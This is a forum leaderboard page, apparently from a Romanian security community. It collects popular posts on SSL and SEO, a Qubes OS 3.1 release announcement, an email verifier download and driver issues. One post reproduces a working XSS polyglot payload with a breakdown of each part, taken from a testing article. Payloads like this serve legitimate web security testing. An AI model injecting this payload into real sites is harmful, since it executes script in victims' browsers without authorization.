Leaderboard
Popular Content
Showing content with the highest reputation on 03/10/16 in all areas
-
Recent google ia in considerare protocolul https:// mai mult decat pana acum, iar efectele le-am simtit si eu. Totusi nu recomand certificatele free care tot circula pe net. Studiu de caz: Pe protocol http:// In acelasi timp, certificatul SSL luat la infiintarea site-ului incepe sa dea roade. Desi aveam ambele versiuni up, nu fortam protocolul https:// din .htaccess, google a decis sa-mi rankeze versiunea https:// in schimbul protocolului normal.2 points
-
Qubes OS 3.1 has been released! Mar 9, 2016 by Joanna Rutkowska in Announcements I’m happy to announce that today we’re releasing Qubes OS 3.1! The major new architectural feature of this release has been the introduction of the Qubes Management infrastructure, which is based on the popular Salt management software. In Qubes 3.1, this management stack makes it possible to conveniently control system-wide Qubes configuration using centralized, declarative statements. Declarative is the key word here: it makes creating advanced configurations significantly simpler. (The user or administrator needs only to specify what they want to get, rather than how they want to get it). This has already allowed us to improve our installation wizard (firstboot) so that it now offers the user the ability to easily select from various options to pre-create some useful configurations, such as Whonix or USB-hosting VMs. Currently, the management stack is limited to dom0 and system-wide Qubes configuration (i.e. what VMs should be present, with what properties, how connected), and notably missing is the ability to configure/manage states inside the VMs or templates (e.g. what packages are to be installed, or what additional services are to be enabled in the VMs). I think most readers will understand very well that marrying powerful and flexible, yet very complex, management software such as Salt, with a security-focused system like Qubes OS is an extremely sensitive task. This is because we really would not like to negate all the isolation we have previously worked hard to build, obviously. Yet, we have recently come up with – what we believe is – an elegant way to also extend our management stack to cover VMs’ internal states. In fact, we already have working code for this and plan on introducing this feature officially in the upcoming Qubes 4.0 release candidate. We might also decide to bring it to the 3.1 release (as an optional update), in case we can’t release 4.0-rc1 soon enough. Once we introduce this missing piece of the Qubes management infrastructure, we will gain almost limitless possibilities for shaping Qubes configurations to fit particular user groups’ needs and for delivering them easily. Besides the management stack, there have been a number of other improvements and bugfixes introduced in 3.1 compared to Qubes 3.0, and most of these have already been mentioned in the original 3.1-rc1 announcement post. To name here just two which might be of critical importance to some users (as they significantly improve hardware compatibility): Qubes 3.1 now supports UEFI-based boot, as well as many new GPUs, thanks to the updated drivers and kernel in Dom0. The ISO can be downloaded here. As usual, we encourage people to verify the integrity of the downloaded images as explained here. Existing users of the 3.0 and 3.1-rcX releases should be able to easily upgrade without re-installing. Enjoy! Sursa: https://www.qubes-os.org/news/2016/03/09/qubes-os-3-1-has-been-released/2 points
-
In caz ca doriti ceva moca si bun, folositi https://blog.cloudflare.com/introducing-universal-ssl/ Pe langa SSL, ofera si alte facilitati super.2 points
-
With Advanced Email Verifier you can: Use the email verifier to clear your email list or database from bounced and undeliverable email addresses, which thereby allows you update and keep your contact lists "clean" on a proactive basis. This means you can protect your email server domain from getting blacklisted and increase your email campaigns' performance. Decrease the Internet traffic and save your bandwidth which means you reduce your costs by focusing only on real prospects. Verify the email addresses directly from the database without import-export — you save a lot of time and manual work thanks to the email address verifier. Our email verifier can connect to any ODBC compatible database like MS Access, MS SQL, MYSQL, Oracle, etc. Quickly load mailing lists in program to check email validity — big time saver! Import email lists containing email addresses and other custom fields for verification from Paradox, DBase, Excel, Text (.CSV, Word HTML, Lotus 1-2-3, QuattroPro, XML, MS Access files, and DBISAM tables (.dat files) which means the email verifier will ensure that you don't lose any contact information, such as first name, last name, company, phone, address, etc. Quickly save the results generated by the email verification software to a text file — for your convenience you can save good and bad emails to different files. Export the email addresses together with custom fields to Paradox, DBase, Excel, Text (.CSV), HTML, Word, SYLK, DIF, Lotus 1-2-3, QuattroPro, SQL script, XML, MS Access, Rich text format files, and MS Windows Clipboard. Handle bounced messages and get high accuracy in list cleaning. Advanced Email Verifier is the only email list cleaner program on the market that has the powerful built-in bounce handler and is able to process a large amount of bounced messages from POP3 and IMAP servers and from your local or network folders extracting the recipient's email address and original message subject — this means you can easily find the recipient in your database and take them off your list. Automatically delete auto-reply emails — Advanced Email Verifier helps you keep your Inbox sane. You won't see "Out of office" and challenge-response email messages flooding your Inbox after each email campaign. Check email syntax — you can quickly run the verification of the email addresses syntax only without checking emails for validity. Sort and filter the email addresses through the email verification software, which means you can organize the contact information in the most convenient way for you. Safely save and recover your data — the email verifier works in a way so that you don't lose your email lists if your computer hangs in the middle of any operation. Download Advanced_Email_Verifier_G-Lock_Software-8.3.6.0.rar1 point
-
Ai placa video nVidia si driverul WHQL 364.47 . A fost sters intre timp de pe site si pusa alta versiune. 364.51 Kernelul raporta anomalii ale GPU-ului....1 point
-
Bypassing Local Windows Authentication To Defeat Full Disk Encryption1 point
-
Dacă te gândești să-ți dai oamenii afară și să bagi proiectele pe upwork, ești mare patron.1 point
-
Unleashing an Ultimate XSS Polyglot Ahmed Elsobky Foreground: When it comes to testing for cross-site scripting vulnerabilities (a.k.a. XSS), you’re generally faced with a variety of injection contexts where each of which requires you to alter your injection payload so it suites the specific context at hand. This can be too tedious and time consuming in most cases, but luckily, XSS polyglots can come in handy here to save us a lot of time and effort. What is an XSS polyglot? An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form. So, what polyglot you came up with? jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e Anatomy of the polyglot (in a nutshell): jaVasCript:: A label in ECMAScript; a URI scheme otherwise. /*-/*`/*\`/*'/*"/**/: A multi-line comment in ECMAScript; a literal-breaker sequence. (/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis! //%0D%0A%0D%0A//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers. </stYle/</titLe/</teXtarEa/</scRipt/--!>: A sneaky HTML-tag-breaker sequence. \x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element!! Total length: 144 characters. Link: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot1 point
-
1 point
-
-1 points
-
-1 points
-
-1 points
-
-1 points
-
-1 points
-
cine are habar referitor la postarea mea totul e contra cost .multumesc-2 points
This leaderboard is set to Bucharest/GMT+03:00